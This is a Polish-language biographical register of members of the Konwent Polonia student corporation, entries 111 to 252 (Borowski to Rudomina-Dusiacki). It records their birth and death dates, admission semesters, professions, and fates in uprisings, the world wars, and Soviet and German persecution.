 111. Witold Borowski, (1905 - 15 marca 1970 w Warszawie) - s. Ignacego, coetus I sem. 1925/26, pracownik Banku Polskiego w Wilnie, żołnierz AK (Okręg - Wilno). Po wojnie pracownik bankowy na Wybrzeżu. [1395]
 112. Karol Bortkiewicz, (1829 - ?) - s. Karola, ziemianin z Kowieńszczyzny, coetus I sem. 1848 [298]

  Leon Bortkiewicz, lata 30-te.

 113. Leon Bortkiewicz, (30 sierpnia 1908 w maj. Sawonary w pow. brasławskim - 26 czerwca 1943 w Miekianach (wcześniej Sawonary) - s. Stefana Henryka Filipa i Aliny Anny z d. Fiedorowicz, brat Janusza (Arkonia), absolwent Gimnazjum im. T. Czackiego w Wilnie 1928, student i absolwent 1937 filozofii w zakresie filologii polskiej Wydziału Humanistycznego USB, c. I sem. 1932/33, w czasie wojny pracował m.in. w gazecie codziennej w Wilnie 1939-40, jako drwal (razem z Józefem Mackiewiczem, a także zarządzał maj. Miekiany 1942-43, zamordowany przez sowieckich partyzantów, pochowany na Cmentarzu w Miekianach [nr ew. 1466]

 114. Władysław Bortkiewicz, (1832 - ?) - ziemianin z gub. kowieńskiej, coetus I sem. 1853, zesłany za powst. 1863 r. [444]
 115. Józef Bortnowski, (1852 - ok. 1880) - z Kowna, coetus I sem. 1873 [715]
 116. Stanisław Bratanowicz, (1866 - przed 1927) - coetus II sem. 1887, lekarz, „zaginął” ZSSR [1003]
 117. Aleksander Braun, (1836 -1900) - s. Ferdynanda, brat Jana (366), coetus I sem. 1855, lekarz w Kraśniku [506]
 118. Alfred Braun, (1885 - 1968) - brat Eugeniusza (1170), coetus II sem. 1907, sędzia Sądu Okręgowego w Łodzi [1201]
 119. Eugeniusz Braun, (1883 - 1955) - brat Alfreda (1201), coetus II sem. 1906, lekarz w Pułtusku, kapitan WP, żołnierz AK [1170]
 120. Jan Braun, (1833 - 1899) - s. Ferdynanda, brat Aleksandra (506), coetus II sem. 1850, lekarz, ginekolog w Lublinie [366]
 121. Antoni Brażewicz, (1857 - 1889) - z Kowieńszczyzny, coetus I sem. 1887, zmarł w czasie studiów [994]
 122. Eliasz Bregman, (1865 - 1941) - coetus II sem. 1883, lekarz, znakomity neurolog. Autor: „Diagnostyka chorób nerwowych” (1910), współzałożyciel: „Neurologia Polska”, „Warszawskie Czasopismo Lekarskie”, zginął w Gettcie Warszawskim [910]
 123. Aleksander Brochocki, (1884-1934) - coetus II sem. 1908, ochotnik WP (1918 - 1921) kapral 13 p. uł. - odznaczony Virtuti Militari. Ziemianin, sędzia [1219]
 124. Józef Brudziński, (1874 - 1917) - s. Feliksa, coetus II sem. 1892, wystąpił z Konwentu bo był antyduelantem - później utrzymywał bliskie kontakty z warszawską organizacją filisterską, lekarz, rektor U.W. (1915 - 1917) [1079]
 125. Stefan Bruellow, (1863 - ?) - z Piotrkowa, coetus I sem. 1885, lekarz [950]
 126. Dawid Ludwik Brühl, (1857 - 1923) - s. Jakuba, coetus I sem. 1877, ginekolog, pryw. docent Uniw. w Bernie, lekarz w Wa-wie [762]
 127. Julian Brykczyński, (1817 - 1842) - s. Antoniego, z Sandomierza, coetus I sem. 1836, zmarł wkrótce po ukończeniu studiów [98]
 128. Wacław Brykner, (1868 - po 1948 r.?) - s. Józefa, coetus I sem. 1893, chemik, wykładowca na Politechnice, w Szkole Wawelberga i Rotwanda, oraz w Wyższej Szkole Ogrodniczej w W-wie [1084]
 129. Kazimierz Brynk, (1828 - ?) - coetus I sem. 1850, zesłany za powst. 1863 r. [364]
 130. Zdzisław Brzeski, (23 listopada 1901 - 15 listopada 1968) - coetus I sem. 1921/22 Konwent Polonia w Wilnie, członek Konwentu Magna-Polonia w Poznaniu, przed wojną prawnik w Poznaniu [1340]
 131. Franciszek Brzeziński, (1867 - 6 sierpnia 1944 w Warszawie) - s. Kazimierza, brat Stanisława (Welecja), prawnik, konsul RP w Niemczech, kompozytor, krytyk muz., publicysta. Razem z bratem Stanisławem opracował i wydał: Śpiewnik studencki. Zbiór piosenek śpiewanych w korporacjach „Polonia”, „Arkonia” i „Welecja” (W. 1939). Zmarł w czasie powstania warszawskiego [992]
 132. Józef Brzeziński, (1833 - ?) - coetus II sem. 1852, urzędnik w Urzędzie Telegraficznym w Dynaburgu [431]
 133. Stanisław Brzeziński, (1882 - 1944) - coetus II sem. 1906, naucz. gimn. poległ w Powst. Warszawskim 8 VIII [1169]
 134. Konrad Brzozowski, (1829 -?) - ziemianin z gub. Warszawskiej, coetus I sem. 1848 [305]

  Mieczysław Brzozowski.

 135. Mieczysław Eugeniusz Brzozowski, (25 stycznia 1903 w Pajde (Wejssenstein) w Estonii - 1940 w Charkowie) s. Henryka i Jadwigi z Kontowtów, brat Jana Macieja, Jerzego Stanisława oraz Zygmnuta Szczęsnego (wszyscy Samogitia), bratanek Stanisława (Arkonia i Lauda), uczeń Gimnazjum Polskiego im. Lelewela w Wilnie, absolwent Polskiego Gimnzjum im. A. Mickiewicza w Kownie, członek POW, ochotnik WP 1919-20, student PW i USB, c. I sem. 1922/23, zawodowy oficer, rtm., służył w 4 Pułku Ułanów, w wojnie obronnej 1939 dowódca szwadronu samochodów pancernych w 81 Dywizjonie Pancernym Pomorskiej Brygady Kawalerii w ramach Armii “Pomorze”, w niewoli sowieckiej w Starobielsku, zamordowany przez NKWD, odznaczony m.in. Medalem Polska Swemu Obrońcy, Medalem Dziesięciolecia, Złotym Krzyżem Zasługi i Krzyżem Niepodległości z Mieczami [nr ew. 1349]

 136. Benedykt Bucewicz, (1872 - przed 1924) - s. Bronisława, coetus I sem. 1891, na jubileuszu Konwentu (1898 r.) miał referat historyczny, lekarz [1066]
 137. Bronisław Budrewicz, (1870 - ?) - s. Józefa, z Kowieńszczyzny, coetus II sem. 1891, lekarz [1071]
 138. Dionizy Bujalski, (1876 - 1906) - coetus II sem. 1904, prawnik, działacz młodzieżowy [1164]
 139. Henryk Bujalski, (1896 - po 1934) - s. Władysława, coetus II sem. 1919/20, ochotnik WP (1919 - 23), por. 42 p. piech., prawnik [1318]
 140. Stanisław Bujniewicz, (1903 -1972) - s. Zygmunta, ochotnik WP (1919 - 20), coetus I sem. 1928/29, sędzia grodzki w Kobryniu, ppor. AK (Okr. Wilno), odzn. Krzyżem Walecznych. Aresztowany w łapance w 1945 r. w Wilnie, wywieziony do Saratowa, wrócił w 1946 r. Aresztowany w 1949 r., skazany („za szpiegostwo”) na 7 lat więzienia, zwolniony w 1954 r. Radca prawny w Toruniu [1426]
 141. Ignacy Bukowiecki, (1840 - ?) - coetus II sem. 1875, nauczyciel w Szkole Realnej Mireckiego w Petersburgu [738]
 142. Wincenty Bułatowicz, (1833 - 1865) - coetus II sem. 1852, lekarz w Orle (Rosja) [428]
 143. Edmund Bułhak, (1835 - 1867) - coetus I sem. 1854, lekarz, ziemianin w gub. mińskiej [484]
 144. Władysław Burdyłło, (1909 - 1942) - coetus I sem. 1931/32, po śmierci ojca, musiał rzucić studia, był zawodowym oficerem. Żołnierz września, następnie AK (Kraków), wzięty w łapance, zamordowany (27 V) w Auschwitz [1449]
 145. Aleksander Burhardt, (1884 - 29 sierpnia 1976) - s. Michała, brat Stefana (1336), POW, adwokat, radny m. Wilna, członek licznych organizacji społ. i kult. [1229]
 146. Stefan Burhardt, (18 grudnia 1899 w Wilnie - 6 grudnia 1991 w Toruniu) - s. Michała oraz Antoniny z Medekszów, brat Aleksandra (1229), członek POW, ochotnik WP (1918 - 20), był w niewoli bolszewickiej, skąd uciekł, coetus II sem. 1920/21, bibliotekarz, bibliofil, muzykolog. Pracował w Bibl. USB, od 1934 kierownik Bibl. Wróblewskich w Wilnie. Żołnierz września, żołnierz AK. Po wojnie w Toruniu, dyr. Bibl. Uniwersyteckiej. Liczne publikacje - opracował monumentalne dzieło: Polonez - katalog tematyczny (12 tys. polonezów!) [1336]
 147. Ernst Wilhelm Bursche, (1831 - 1904) - s. Johanna, coetus I sem. 1854, pastor e.a., superintendent płocki [490]
 148. Juliusz Bursche, (1862 - 1942) - s. Ernesta (491), brat Edmunda (484), coetus II sem. 1880, do 1939 r. członek Zarządu Stowarzyszenia Filistrów Konwentu Polonia w Warszawie. Jedna z najwybitniejszych postaci protestantyzmu polskiego. Biskup Kościoła Ew. Augsb. w Polsce. Dr h. c. Uniw. Warsz. Zamordowany przez Niemców w Oranienburgu.[842]
 149. Edmund Bursche, (1881-1940) - s. Ernesta (491), brat Juliusza (842), coetus II sem. 1900, v-prezes Stow. Fil. Konwentu Polonia w W-wie (do 1939 r.), pastor e. a., prof., dziekan U. W., historyk polskiej reformacji. Aresztowany przez Gestapo (17 X 1939 r.), zamordowany w Gusen [1129]
 150. Mirosław Burzyński, (1825 - 1893) - s. Bernarda, coetus I sem. 1849, lekarz w Brześciu Lit. i Warszawie [336]
 151. Jan Buse, (1859 - 1937) - s. Jana, brat Rudolfa (1099), coetus II sem. 1878, pastor e.a. w Iłowie i Piotrkowie Tryb. [793]
 152. Rudolf Buse, (1871 - 1917) - s. Jana, brat Jana (1099), coetus I i II sem. 1894, pastor e.a., superintendent kaliski, wywieziony do Rosji, zmarł w Saratowie [1099]
 153. Adam Busz, (1886 - ?) - coetus II sem. 1907, ziemianin z Wileńszczyzny, przyrodnik [1192]
 154. Aleksander Buszman, (1823 - przed 1889) - coetus I sem. 1841, urzędnik w komorze celnej w Taurogach i Warszawie [185]
 155. Tadeusz Buyko, (1900-1943) - s. Kazimierza, ochotnik WP (1919-21), coetus I sem. 1922/23, odzn. Virtuti Militari, starosta pow. w Dubnie [1356]
 156. Zygmunt Buyko (Bujko), (1904 - 4 lutego 1998 w Katowicach) - s. Jana, ochotnik WP (1920), coetus I sem. 1924/25, adwokat w Wilnie. Por. WP odznaczony Krzyżem Walecznych (za kamp. wrześniową), kpt AK (okr. Radom), po wojnie radca prawny w Katowicach [1384]
 157. Henryk Byczkowski, (1820 - ?) - s. Franciszka, coetus I sem. 1841, urzędnik w Łowiczu [186]
 158. Stanisław Byszewski, (1860 - ?) - s. Adama, z gub. warszawskiej, ziemianin, coetus I sem. 1881 [852]
 159. Stanisław Feliks Bzura, (1870 - 1948) - s. Władysława, coetus I sem. 1895, lekarz, pionier winiarstwa w Polsce. Napisał: Winorośl i zastosowanie jej do przemysłowej hodowli w Polsce. Warszawa 1938 [1101]
 160. Michał Ceraski, (1814 - 1870) - s. Józefa, brat Karola (87), coetus II sem. 1837, pastor e. r. w Dziewałtowie, Birżach, Kojdanowie uczestnik spisku braci Skarżyńskich (1846 r.) i powstania 1863 r. [125]
 161. Karol Ceraski, (1817 - 1864) - s. Józefa, brat Edwarda (125), coetus I sem. 1835, nauczyciel w Słucku [87]
 162. Władysław Ceraski, (1843 - 1877) - coetus I sem. 1865, pastor e.r. w Wilnie [628]
 163. Stanisław Chalecki, (1896 - 1963) - s. Stanisława, coetus II sem. 1919/20, współautor Memoriału w sprawie sanacji K! (23 I 1922), ochotnik WP (1918 - 20), pracownik Wil. Banku Ziemskiego. W AK, aresztowany przez NKWD w 1944 r. i wysłany do obozu w Ostaszkowie. Do kraju wrócił w 1947 r. [1319]
 164. Edward Chałubiński, (1840 - 1863) - s. Sotera, bratanek Tytusa (169), coetus II sem. 1860, poległ w powst. 1863 r. [601]
 165. Tytus Chałubiński, (1820 - 1889) - s. Szymona, ojciec Ludwika (Arkonia), lekarz, botanik, działacz społeczny. Reformator „Polonii” [169]
 166. Stanisław Chądzyński, (1897- po 1934) - ochotnik WP (1918 - 20), coetus II sem. 1920/21 [1335]
 167. Czesław Chełstowski, (1899 - 1981) - s. Leona, ochotnik WP (1919-21), coetus II sem. 1919/20, odznaczony Krzyżem Walecznych, w niewoli sowieckiej, więziony w obozie w Griazowcu (1940 - 41), był w II Korpusie, zmarł w Walii [1316]
 168. Alojzy Chludziński, (1832 - 1869) - s. Ignacego, ziemianin, coetus II sem. 1851, starszy brat błogosławionej Celiny Borzęckiej [405]
 169. Adam Chmara, (1829 - 1889) - s. Hilarego, brat Joachima (354), ziemianin w gub. mińskiej, coetus I sem. 1850 [355]
 170. Joachim Chmara, (1830 - 1868) - s. Hilarego, brat Adama (355), ziemianin w gub. mińskiej, coetus I sem. 1850 [354]
 171. Jan Chodakiewicz, (1906 - 1962) - s. Józefa, coetus I sem. 1929/30, aplikant sądowy w Wilnie, żołnierz AK (Wilno), wywieziony w 1945 r. do ZSRR, był w obozie w Stalinogorsku, wrócił w 1948 r. - adwokat [1429]
 172. Ludwik Chodakowski, (1843 - po 1905) - s. Aleksandra, coetus I sem. 1864, lekarz w Birżach [621]
 173. Antoni Cholewo, (1885 - 1945) - coetus II sem. 1903, lekarz w Szamotułach [1152]
 174. Rudolf Chołowiecki, (1887 - 1940) - s. Mariana, coetus II sem. 1909, ppor. 25 p. uł. (1918 - 1921). Ziemianin, ostatni burmistrz Nieświeża, aresztowany przez NKWD we wrześniu 1939 r., więziony w Kozielsku, ofiara zbrodni katyńskiej [1242]
 175. Michał Chreptowicz, (1809 - 1891), s. Ireneusza, założyciel Konwentu Polonia, działacz państwowy, dyplomata rosyjski [10]
 176. Stanisław Chrapowicki, (1891-1949) - s. Włodzimierza, coetus II sem. 1913, w I woj. św., zmobilizowany w armii ros. Od 1918 w Polsce w MSWojsk. w dep. Szkolnictwa, pracował przy formowaniu szkół wojskowych. Sędzia w Częstochowie, po 1948 r. notariusz w Piotrkowie [1287]
 177. Antoni Chrząszczewski, (1862 - ?) - s. Ignacego, coetus I sem. 1883, ziemianin Kongresówki [900]
 178. Jerzy Chylewski, (1862 - ?) - coetus II sem. 1881, radca prawny w Petersburgu [866]
 179. Jan Cichowski, (1904 - 1944) - coetus I sem. 1923/24, sędzia Grodzki w W-wie, zamordowany w obozie Flossenburg (24 XII) [1366]
 180. Tadeusz Zadora-Ciszewski, (1914 - 1940) - s. Mirosława, coetus I sem. 1936/37, ppor. WP, żołnierz września, jeniec sowiecki w obozie w Kozielsku, zamordowany w Katyniu [1499]
 181. Eliasz (Juliusz) Konstanty Ciechanowiecki, (1820 - 1880) - s. Stanisława, ziemianin, coetus I sem. 1840 [162]
 182. Ignacy Ciechanowiecki, (1815 - po 1873) - s. Feliksa, ziemianin, coetus I sem. 1833, za powst. 1863 r. zesłany [48]
 183. Jerzy Ciechomski, (1871 - ?) - z Torunia, studiował chemię, coetus II sem. 1892, [1074]
 184. Wacław Ciechoński, (1873 - 1925) - s. Maurycego, coetus II sem. 1895, dr chemii, ofiarował Konwentowi bibliotekę ponad 1000 tomów [1105]
 185. Jan Ciemnołoński, (1914 - 19 marca 1996) - coetus I sem. 1935/36, por. WP, wywieziony do ZSRR, wyszedł z II Korpusem. Studia lekarskie ukończył w Bejrucie, w 1946 r. wrócił do kraju, lekarz w Krakowie , napisał wspomnienia [1491]
 186. Konstanty Cierpiński, (1898 - 18 września 1979) - s. Zygmunta, ochotnik WP (1919 - 20), ziemianin, prawnik, sekretarz Prokuratorii Generalnej (oddz. w Wilnie). W kamp. wrześniowej w 1 p. art. Więziony w obozach w Starobielsku i Griazowcu. Wyszedł z ZSRR z II Korpusem, przeszedł cały szlak bojowy (por. w 6 p. art. lek.), walczył pod Monte Cassino. Odzn. Krzyżem Walecznych. Wrócił do kraju [1317]
 187. Tymoteusz Ciesielski, (1832 - ?) - s. Hipolita, coetus II sem. 1852, lekarz wiejski w gub. kowieńskiej [429]
 188. Adam Władysław Cumft, (2 października 1860 w Radziwiliszkach - 13 listopada 1911 w Radziwiliszkach) - s. Marcina (Konwent Polonia, nr ew. 472) i NN z d. Kurnatowska, brat Jana (Konwent Polonia, nr ew. 882) i Konstantego (Konwent Polonia, nr ew. 1029), absolwent gimnazjum kalwińskiego w Słucku, c. II sem. 1882, pastor ewangelicko-reformowany w Birżach, pochowany w Radziwiliszkach [nr ew. 883]
 189. Gotthelf Marcin Cumft, (23 listopada 1831 w Radziwiliszkach na Litwie - 5 lipca 1895 w Radziwiliszkach na Litwie) - s. Gabriela (młynarza) i Carerine von Reuter, ojciec Adama (Konwent Polonia, nr ew. 883), Jana (Konwent Polonia, nr ew. 882) i Konstantego (Konwent Polonia, nr ew. 1029), absolwent gimnazjum kalwińskiego w Słucku, student teologii UD, c. I sem. 1854, pastor ewangelicko-reformowany, superintendent. wileński, pochowany na cmentarzu w Radziwiliszkach [nr ew. 472]
 190. Jan Gabriel Cumft, (29 listopada 1864 w Radziwiliszkach - 27 lutego 1929 w Wilnie) s. Marcina (Konwent Polonia, nr ew. 472) i NN z d. Kurnatowska, brat Adama (Konwent Polonia, nr ew. 883) i Konstantego (Konwent Polonia, nr ew. 1029), absolwent gimnazjum kalwińskiego w Słucku, student i absolwent med. UD 1882-1889, c. II sem. 1882, specjalizował się w okulistyce u Edwarda Reehlmana w Dorpacie, a następnie u Nenckiego w Sankt Petersburgu, w 1892 wysłany do Astrachania, aby zwalczać epidemię cholery, w 1893 prowadził w Berlinie badania nad fizjologią siatkówki, jako żołnierz armii rosyjskiej uczestniczył w wojnie rosyjsko-japońskiej i I wojnie światowej, ppłk lek. WP 1919-1920, szef sanitarnej grupy wojsk Litwy Środkowej, po wojnie mieszkał i pracował w Wilnie, należał do Wileńskiego Towarzystwa Lekarskiego i Wileńskiego Towarzystwa Okulistycznego [nr ew. 882]
 191. Konstanty Cumft, (1869 w Radziwiliszkach - 1913 w Rydze) - s. Marcina (Konwent Polonia, nr ew. 472) i NN z d. Kurnatowska, brat Jana (Konwent Polonia, nr ew. 882) i Adama (Konwent Polonia, nr ew. 883), absolwent gimnazjum kalwińskiego w Słucku, student i absolwent matematyki UD, c. II sem. 1888, nauczyciel gimnazjalny, doc. Politechniki w Rydze (matematyk) [nr ew. 1029]
 192. Stefan Cybulski, (1888 - 1942) - s. Stefana, coetus I sem. 1910, ochotnik WP (1920), lekarz w Tomaszowie Lub. W AK, aresztowany przez Niemców, więziony na Zamku w Lublinie, po b. ciężkim śledztwie, zmarł zaraz po zwolnieniu [1246]
 193. Piotr Cyrtowt, (1856 - po 1924) - s. Kaspra, coetus I sem. 1880, lekarz, okulista w Rosieniach i Retowie. „Litwin, który godził swe pochodzenie litewskie z ideałami Polaka” [826]
 194. Wiktor Cywiński, (1900 - wrzesień 1981) - ochotnik WP 1920, coetus I sem. 1927/28, pracownik Wil. Banku Ziemskiego. Żołnierz września, wzięty do sowieckiej niewoli, był w obozie w Kozielsku, ale jako żołnierz (szeregowy), został zwolniony (!) - żołnierz AK, po wojnie w Jeleniej Górze. [1413]

  Włodzimierz Cywiński, Wilno 1930 r.

 195. Włodzimierz Cywiński, (1903 - 1939) - ochotnik WP (1920), coetus II sem. 1924/25, art. malarz, pracował na Zamku Królewskim w W-wie w Pracowni Konserwacji Obrazów. Żołnierz września, poległ (popełnił samobójstwo - „nie potrafił znieść ogromu klęski”) - 15 IX 1939 r. k. Jabłonny [1386]

 196. Józef Czajkowski, (1876 - ?) - z gub. kijowskiej, coetus II sem. 1902, lekarz [1148]
 197. Stanisław Czaplicki, (1902 - 6 stycznia 1976) -s. Michała, ochotnik WP (1920), coetus II sem. 1924/25, urzędnik w Min. Komunikacji, we wrześniu 1939 r. internowany na Litwie, wywieziony do ZSRR (obóz w Griazowcu), wyszedł z II Korpusem, mjr WP. Po wojnie w Anglii, pracownik apteki, zmarł w Londynie [1389]
 198. Bronisław Czapkiewicz, (1880 - 1952) - s. Józefa, coetus II sem. 1902, dr chemii, dyr. szkoły technicznej w Brześciu n. Bugiem [1149]

  Władysław Czapkiewicz, Wilno ok. 1930 r.

 199. Władysław Czapkiewicz, (1907 - 20 listopada 1991) - s. Bronisława (1149), coetus I sem. 1927/28, praktykant PKP w Brześciu n. Bugiem. W czasie wojny w Warszawie, ppor. AK. Po wojnie w Olsztynie.[1416]

  Jerzy Czapski, ok. 1880 r.

 200. Jerzy hr. Hutten-Czapski, (14 listopada 1861 - 26 lipca 1930) herbu Leliwa, s. Emeryka i Elżbiety z d. Meyendorff, brat Karola (nr ew. 795), c. II sem. 1879, dr praw, ziemianin i działacz społeczny, współtwórca Wileńskiego Koła Filistrów (1922) i jego prezes [nr ew. 825]

 201. Karol Hutten-Czapski, (1860 - 1904) - s. Emeryka, brat Jerzego (825), ziemianin, coetus II sem. 1878, od 1890 r. prezydent Mińska, zasłużony dla miasta [795]
 202. Mikołaj Hutten-Czapski, (1856 - 1919) - s. Mariana, brat Stanisława (668), ziemianin z Wołynia, coetus II sem. 1876 [753]
 203. Stanisław Czapski Hutten, (1848 - 1932) - s. Mariana, brat Mikołaja (753), ziemianin na Wołyniu, coetus I sem. 1869 [668]
 204. Franciszek Czarnecki, (1861 - ?) - z Płocka, studiował teologię w l. 1881-1883, coetus I sem. 1881 [860]
 205. Gracjan Czarnocki, (1829 - 1860) - s. Karola, brat Maurycego (121), Włodzimierza (122), Gustawa (220) i Franciszka (249), coetus I sem. 1848, ziemianin, kierował „Hôtel de l’Europe”, Warszawa [299]
 206. Gustaw Czarnocki, (1826 - 1890) - s. Karola, brat Maurycego (121), Włodzimierza (122) i Franciszka (249), ziemianin, coetus II sem. 1843, nauczyciel domowy, urzędnik [220]
 207. Franciszek Czarnocki, (1827-1859) - s. Karola, brat Maurycego (121), Włodzimierza (122), Gustawa (220) i Gracjana (299), coetus I sem. 1845, ks. katol. [249]
 208. Leon Czarnocki, (1893 - 3 września 1971) - coetus II sem. 1919/20, ochotnik WP (1918 - 21), urzędnik Starostwa Grodzkiego w Wilnie [1321]
 209. Maurycy Czarnocki, (1819-1861) - s. Karola, brat Włodzimierza (122), Gustawa (220), Franciszka (249) i Gracjana (299), coetus I sem. 1837, urzędnik [121]
 210. Włodzimierz Czarnocki, (1820-1864) - s. Karola, brat Maurycego (121), Gustawa (220), Franciszka (249) i Gracjana (299), coetus I sem. 1837, uczestnik powstania 1863 r., zesłany zmarł w Permie [122]
 211. Czesław Czarnowski, (1883 - 1983) - s. Maksymiliana, coetus II sem. 1902, lekarz - otolaryngolog, prof. USB, zesłany do ZSRR, wyszedł z II Korpusem. Pionier polskiego sportu żeglarskiego, malarz. Autor: Strzępy wspomnień (W.1973) [1145]
 212. Aleksander Czekanowski, (1833 - 1876) - s. Wawrzyńca, coetus II sem. 1855, za powst. 1863 r. zesłany, wybitny badacz Wschodniej Syberii, geolog, paleontolog [514]
 213. Stanisław Czekanowski, (1868 - 1963) - s. Wincentego, coetus II sem. 1888, dyr. dep. w Min. Roln., prezes Fundacji Staszicowskiej. Autor wspomnień [1031]
 214. Józef Czerkasow, (1898 - 1980) - syn Wiktora, coetus II sem. 1920/21, ochotnik WP (1918-1920), ppor., po II wojnie adwokat, zmarł w Jeleniej Górze [1331]
 215. Ludwik Czernecki, (1814 - po 1889) - coetus I sem. 1837, uczestnik spisku K. Hildebrandta, lekarz w Lublinie [116]
 216. Cezary Czerniewski, (1865 -?) - s. Stefana, brat Edwarda (759), coetus II sem. 1885, aptekarz [957]
 217. Edward Czerniewski, (1855 - 1898) - s. Stefana, brat Cezarego (957), coetus I sem. 1877, lekarz, współzałożyciel Pol. Tow. Lekarskiego w Chicago (1892) [759]
 218. Kazimierz Czerniewski, (1833 - ?) - s. Franciszka, ziemianin z gub. kowieńskiej, coetus II sem. 1852 [437]
 219. Michał Czygłowski, (1824 - 1862) - coetus I sem. 1845, pastor e.r. w Kiejdanach, nauczyciel gimnazjum w Słucku [246]
 220. Ignacy Czyż, (ok. 1809 - ?) - założyciel Konwentu Polonia, przerwał studia dla powst. listop. [11]
 221. Józef Ćwiklicz, (1837 - po 1913) - s. Jana, coetus I sem. 1860, lekarz w Kijowie [595]
 222. Jan Dal-Trozzo, (1869 -1935) - s. Antoniego, coetus II sem. 1890, założył w Konwentu kasę zapomogową swego imienia. Ziemianin. Nauczyciel w Warszawie, autor podręczników (geometrii) [1058]
 223. Leon Daraszkiewicz, (1866 - po 1924) - s. Ludwika (509), coetus I sem. 1884, lekarz - psychiatra, zmarł (?) po 1924 r. w ZSRR [924]
 224. Ludwik Daraszkiewicz, (1835 - 1888) - brat Pawła (516), coetus I sem. 1855, lekarz w Subbath i Grywie (pow. iłłuksztański) [509]
 225. Paweł Daraszkiewicz, (1836 - 1858) - brat Ludwika (509), coetus II sem. 1855, zmarł w czasie studiów [516]
 226. Edward Jakub Dauksza, (1836 -1890) - s. Kazimierza, coetus II sem. 1856, zesłany za powst. 1863 r. Działacz i poeta litewski [529]
 227. Kazimierz Dauksza, (1883 - przed 1928?) - coetus II sem. 1907, sędzia Sądu Okręgowego [1209]
 228. Władysław Dauksza, (1838 - przed 1889) - coetus II sem. 1857, urzędnik, uczestnik powst. 1863 r., na emigracji (Francja) [569]
 229. Franciszek Dąbrowski, (1855 - 1913) - s. Teodora, brat Józefa (936), coetus I sem. 1881, lekarz w Duksztach [849]
 230. Józef Dąbrowski, (1863 - 1915) - s. Teodora, brat Franciszka (849), coetus II sem. 1884, lekarz w Kretyndze [936]
 231. Józef Aleksander Dąbrowski, (1911 - 1964) - coetus I sem. 1930/31, pracownik Sądu Okręgowego w Lidzie, mason, żołnierz AK (okręg wileński), po wojnie notariusz w Morągu [1443]

  Kazimierz Dąbrowski

 232. Kazimierz Leon Dąbrowski, (16 grudnia 1862 na Kowieńszczyźnie - 30 lipca 1931 w Wilnie) herbu Junosza, s. Aleksandra i Wandy z Landsbergów, bratanek Leona Dąbrowskiego (Konwent Polonia), absolwent Gimnazjum w Parnawie, student i absolwent med. UD 1885-1891, c. I sem. 1885, lekarz, pracował w Szpitalu Oftalmicznym w Wilnie, od 1925 dyrektor szpitala Sawicz w Wilnie, pochowany na Cmentarzu Bernardyńskim w Wilnie (grób się nie zachował) [nr ew. 945]

 233. Leon Władysław Ludwik Dąbrowski, (25 sierpnia 1830 w Danieliszkach - 1912 w Dereczynie) herbu Junosza, s. Adama (sędziego granicznego pow. wiłkomierskiego) i Antoniny z d. Korewa, stryj Kazimierza (Konwent Polonia), absolwent Gimnazjum w Wilnie, student i absolwent wydziału historyczno-filologicznego UD, c. I sem. 1851, nauczyciel geografii kalwińskim Gimnazjum w Słucku. uczestnik powstania styczniowego, zesłany, katorgę odbywał w Siwakowej i Darasuniu, później na osiedleniu w Irkucku, pochowany na Cmentarzu w Dereczynie [nr ew. 387]
 234. Stanisław Dąbrowski, (1861 - przed 1905 ?) - coetus II sem. 1884, lekarz w Rosji [940]
 235. Tadeusz Dembowski, (1856 - 1930) - s. Józefa, coetus I sem. 1879, współtwórca Wileńskiego Koła Filistrów (1922), lekarz, ogromnie aktywny w życiu zawodowym, kulturalnym i politycznym Wilna, konserwatysta, współzałożyciel „Słowa” [809]
 236. Józef Demontowicz, (1823 - 1876) - s. Ildefonsa, coetus II sem. 1841, w czasie powst. 1863 r. organizował zakup broni, emigrant [194]
 237. Leopold Dengel, (1887 -1945) - coetus II sem. 1907, lekarz, Łódź, kpt WP (1918 -1921) [1193]
 238. August Karol Diehl, (1837 - 1908) - s. Karola, coetus I sem. 1856, pastor e.r. superintendent gen. w Królestwie Polskim [522]
 239. Ferdynand Dombrowicz, (1816 - 1888) - s. Wincentego, coetus II sem. 1840, farmaceuta w Petersburgu [167]
 240. Justyn Domeyko, (1814 - przed 1889) - ziemianin z Kowieńszczyzny, coetus II sem. 1839 [156]
 241. Karol Domeyko, (1815 - przed 1889) - coetus I sem. 1837, ziemianin, gubernia kowieńska [114]
 242. Tadeusz Dobaczewski, (1918 - 7 kwietnia 1997) - s. Eugeniusza, coetus I sem. 1938/39, żołnierz września, w stalagu, po wojnie notariusz w Żninie [1509]
 243. Andrzej Sas-Doliński (Andrew Roland), (1915 - 17 lutego 1994) - coetus II sem. 1933/34, w 1939 r. przedostał się do Francji, ukończył Szkołę Podchorążych w Coëtquidan (Bretania), zdążył się ewakuować do Anglii, służył na niszczycielu „Burza” (lub „Błyskawica”?). Po wojnie w Londynie pracował w księgarstwie. Bibliofil, kolekcjoner - gromadził fotografie dot. Wilna i Konwentu [1482]
 244. Karol Dowgiałło, (1896 - 1940) - s. Dominika, coetus II sem. 1914, mgr praw., w l. 1919 - 21 rtm. 1 p. uł. Krechowieckich, odzn. Krzyżem Walecznych (dwukrotnie), ziemianin, uczestnik kamp. wrześniowej, awansowany do st. majora. 24 IX 1939 r. aresztowany przez NKWD, zamordowany w kwietniu 1940 r. Ofiara zbrodni katyńskiej z tzw. “listy ukraińskiej”. [1293]
 245. Edmund Dowgiłłowicz, (1832 - ok. 1862) - s. Klemensa, ziemianin z kowieńskiego, coetus II sem. 1853, lekarz w wojsku ros. [461]
 246. Ludwik Dowkont, (1831 - ?) - coetus II sem. 1852, zmarł wkrótce po studiach ? [438]
 247. Aleksander ks. Drucki-Lubecki, (1861 - 1926) - s. Aleksandra, brat Władysława (970), coetus II sem. 1882, ziemianin z gub. grodzieńskiej [891]
 248. Władysław ks. Drucki-Lubecki, (1864 -1913) - s. Aleksandra, brat Aleksandra (891), coetus I sem. 1886, ziemianin, prezydent Grodna w 1907 r., pierwszy prezes Tow. Automobilistów Kr. Polskiego, zginął, zamordowany. Zbrodnia ta była przedmiotem, długiego i głośnego procesu, sprawca nie został ustalony [970]
 249. Ryszard Druwe, (1865 - ?) - z Kowieńszczyzny, coetus I sem. 1885 [944]
 250. Karol Drzewiecki, (1857 - po 1888) - s. Karola, coetus II sem. 1877, inżynier (budowniczy kolei transkaspijskiej), z Podola [777]
 251. Leopold Duński, (1828 - 1856) - s. Józefata, coetus II sem. 1847, lekarz [289]
 252. Antoni Rudomina-Dusiacki (Rudomino-Dusiacki), (1917 - 20 ? czerwca 1996 w Mountain Views w Stanach Zjednoczonych) - s. Aleksandra, coetus II sem. 1937/38, wywieziony w 1939 r. do ZSRR, wyszedł z II Korpusem, służył w lotnictwie, mjr. RAF (Dywizjon 318), odzn. Virtuti Militari i Krzyżem Walecznych (dwukrotnie) [1502]
